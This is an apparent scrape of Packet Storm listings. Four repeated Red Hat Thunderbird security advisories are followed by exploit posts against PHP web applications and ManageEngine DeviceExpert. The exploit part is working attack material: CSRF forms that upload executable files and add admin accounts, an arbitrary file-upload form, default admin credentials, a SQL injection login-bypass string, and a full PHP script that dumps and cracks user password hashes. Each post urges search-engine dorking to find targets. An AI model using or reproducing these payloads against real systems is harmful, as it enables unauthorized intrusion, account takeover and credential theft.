Red Hat Security Advisory 2024-6722-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6722.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6722-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6722  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6722-03

Red Hat Security Advisory 2024-6721-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6721.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6721-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6721  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6721-03

Red Hat Security Advisory 2024-6720-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6720.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6720-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6720  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6720-03

Red Hat Security Advisory 2024-6719-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6719.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:6719-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6719  
Issue date:         2024-09-17  
Revision:           03  
CVE Names:          CVE-2024-7652  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: 115.15/128.2 ()

* mozilla: Type confusion when looking up a property name in a "with" block (CVE-2024-8381)

* mozilla: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (CVE-2024-8382)

* mozilla: Garbage collection could mis-color cross-compartment objects in OOM conditions (CVE-2024-8384)

* mozilla: WASM type confusion involving ArrayTypes (CVE-2024-8385)

* mozilla: SelectElements could be shown over another site if popups are allowed (CVE-2024-8386)

* mozilla: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (CVE-2024-8387)

* thunderbird: Crash when aborting verification of OTR chat (CVE-2024-8394)

* mozilla: Type Confusion in Async Generators in Javascript Engine (CVE-2024-7652)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7652

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2307331  
https://bugzilla.redhat.com/show_bug.cgi?id=2309427  
https://bugzilla.redhat.com/show_bug.cgi?id=2309428  
https://bugzilla.redhat.com/show_bug.cgi?id=2309430  
https://bugzilla.redhat.com/show_bug.cgi?id=2309431  
https://bugzilla.redhat.com/show_bug.cgi?id=2309432  
https://bugzilla.redhat.com/show_bug.cgi?id=2309433  
https://bugzilla.redhat.com/show_bug.cgi?id=2310481  
https://bugzilla.redhat.com/show_bug.cgi?id=2310490

Red Hat Security Advisory 2024-6719-03

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Reservation Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

  [+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New Menu</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Menu Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Category</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="cat" required="">  
                                                         <option value="9">Dessert</option>  
                                                        <option value="6">Main Course</option>  
                                                        <option value="7">Pasta</option>  
                                                        <option value="10">Rice</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Subcategory</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="subcat">  
                                                         <option>Drinks</option>  
                                                        <option>Lunch and Dinner</option>  
                                                        <option>Mirienda</option>  
                                                        <option>Non Combo Meal</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Description</label>  
                      <div class="col-lg-8">   
                        <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Price</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Image</label>  
                      <div class="col-lg-8">   
                        <input type="file" class="form-control" name="image" id="title">  
                      </div>  
                  </div> 

                    
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>

    [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New User</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Full Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="username">Username</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="password">Password</label>  
                      <div class="col-lg-8">   
                        <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
                      </div>  
                  </div> 

                                                                        
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Reservation Management System 1.0 Cross Site Request Forgery

Online Job Recruitment Portal Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Recruitment Form</title>  
</head>  
<body>  
    <h1>Recruitment Form</h1>  
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">  
          
        <label for="photograph">Photograph:</label>  
        <input type="file" id="photograph" name="photograph" required><br><br>

          
        <label for="placeofbirth">Place of Birth:</label>  
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

          
        <label for="fhname">Father's/Husband's Name:</label>  
        <input type="text" id="fhname" name="fhname" required><br><br>

          
        <label for="marital_status">Marital Status:</label>  
        <select id="marital_status" name="marital_status">  
            <option value="single">Single</option>  
            <option value="married">Married</option>  
            <option value="divorced">Divorced</option>  
        </select><br><br>

          
        <label for="Nationality">Nationality:</label>  
        <select id="Nationality" name="Nationality">  
            <option value="national1">Nationality 1</option>  
            <option value="national2">Nationality 2</option>  
        </select><br><br>

          
        <label for="handicapped">Handicapped:</label>  
        <select id="handicapped" name="handicapped">  
            <option value="yes">Yes</option>  
            <option value="no">No</option>  
        </select><br><br>

          
        <label for="religion">Religion:</label>  
        <select id="religion" name="religion">  
            <option value="religion1">Religion 1</option>  
            <option value="religion2">Religion 2</option>  
        </select><br><br>

          
        <label for="blood">Blood Group:</label>  
        <select id="blood" name="blood">  
            <option value="A+">A+</option>  
            <option value="B+">B+</option>  
            <option value="AB+">AB+</option>  
            <option value="O+">O+</option>  
            <option value="O-">O-</option>  
        </select><br><br>

          
        <label for="mark">Identification Mark:</label>  
        <input type="text" id="mark" name="mark" required><br><br>

          
        <input type="submit" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Job Recruitment Portal Project 1.0 Arbitrary File Upload

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

**IFSC Code Finder Portal 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c8714f261d6bcdc7f5ee89b4f1473342ced816a03f174b9a8bc607a329616e0

Download | Favorite | View

**IFSC Code Finder Portal 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/ifsc-code-finder-project-using-php/                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/ifscfinder/admin/login.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

IFSC Code Finder Portal 1.0 Insecure Settings

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/eahp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Emergency Ambulance Hiring Portal 1.0 SQL Injection

ManageEngine DeviceExpert version 5.9.7 build 5970 allows for usernames and salted MD5 password hashes to be disclosed.

    ====================================================================================================================================| # Title     : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://manageengine.com/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.[+] LIne 87 set your targer .    [+] usage : C:\www\test>php 3.php[+] Payload :<?phpclass ManageEngineDeviceExpert {    private $host;    private $port;    private $ssl;    public function __construct($host, $port = 6060, $ssl = true) {        $this->host = $host;        $this->port = $port;        $this->ssl = $ssl;    }    private function sendRequest($path) {        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function getUsers() {        echo "Reading users from master...\n";        $response = $this->sendRequest('/ReadUsersFromMasterServlet');        if (!$response) {            echo "Connection failed\n";            return null;        }        if (strpos($response, '<discoverydata>') !== false) {            preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);            echo "Found " . count($matches[0]) . " users\n";            return $matches[0];        } else {            echo "Could not find any users\n";            return null;        }    }    public function parseUserData($user) {        if (!$user) return null;        preg_match('/<username>([^<]+)<\/username>/', $user, $username);        preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);        preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);        preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);        preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);        $hash = base64_decode($encoded_hash[1]);        $password = null;        $weak_passwords = ['12345', 'admin', 'password', $username[1]];        foreach ($weak_passwords as $weak_password) {            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {                $password = $weak_password;                break;            }        }        return [            'username' => $username[1],            'password' => $password,            'hash' => bin2hex($hash),            'role' => $role[1],            'email' => $email[1],            'salt' => $salt[1]        ];    }    public function run() {        $users = $this->getUsers();        if (!$users) return;        foreach ($users as $user) {            $user_data = $this->parseUserData($user);            if (!$user_data) continue;            echo "User: " . $user_data['username'] . "\n";            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";            echo "Hash: " . $user_data['hash'] . "\n";            echo "Role: " . $user_data['role'] . "\n";            echo "Email: " . $user_data['email'] . "\n";            echo "Salt: " . $user_data['salt'] . "\n";            echo "----------------------------\n";        }    }}// استخدام الكلاس$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');$deviceExpert->run();?>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#firefox